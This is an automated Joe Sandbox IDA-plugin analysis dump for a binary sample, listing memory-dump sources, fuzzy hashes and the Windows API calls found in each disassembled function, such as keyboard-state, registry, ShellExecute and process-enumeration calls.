                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 288456094-0
                                                                                                                                                                            • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                            • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                                                                            • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                            • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32(?), ref: 004449B0
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                            • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                                                            • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                                                                            • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                                                            • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32(?), ref: 00444BA9
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                            • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                            • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                                                                            • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                            • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                                                            • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                                                                            • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                                                            • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                                                                            • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                                                            • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                                                                            • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                                                            • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 00457C34
                                                                                                                                                                            • _memset.LIBCMT ref: 00457CE8
                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                            • API String ID: 1325244542-1426351568
                                                                                                                                                                            • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                                                                            • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                                                                            • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                                                                            • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004737F6
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547909840-0
                                                                                                                                                                            • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                            • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                                                                            • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                            • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2354583917-0
                                                                                                                                                                            • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                            • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                                                                            • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                            • GetMenu.USER32 ref: 004776AA
                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047771A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1823500076-0
                                                                                                                                                                            • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                            • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                            • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 896007046-0
                                                                                                                                                                            • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                                                            • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                                                                            • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                            • SendMessageW.USER32(02F61A68,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                            • SendMessageW.USER32(02F61A68,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                            • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                            • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                                                                            • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004484C4
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                                                                            • IsMenu.USER32(?), ref: 0044857B
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                                                                            • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                            • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                                                                            • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                            • String ID: 0vH
                                                                                                                                                                            • API String ID: 327565842-3662162768
                                                                                                                                                                            • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                                                            • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                                                                            • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                                                                            • GetFocus.USER32 ref: 00448B1C
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3429747543-0
                                                                                                                                                                            • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                            • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                                                                            • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                            • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
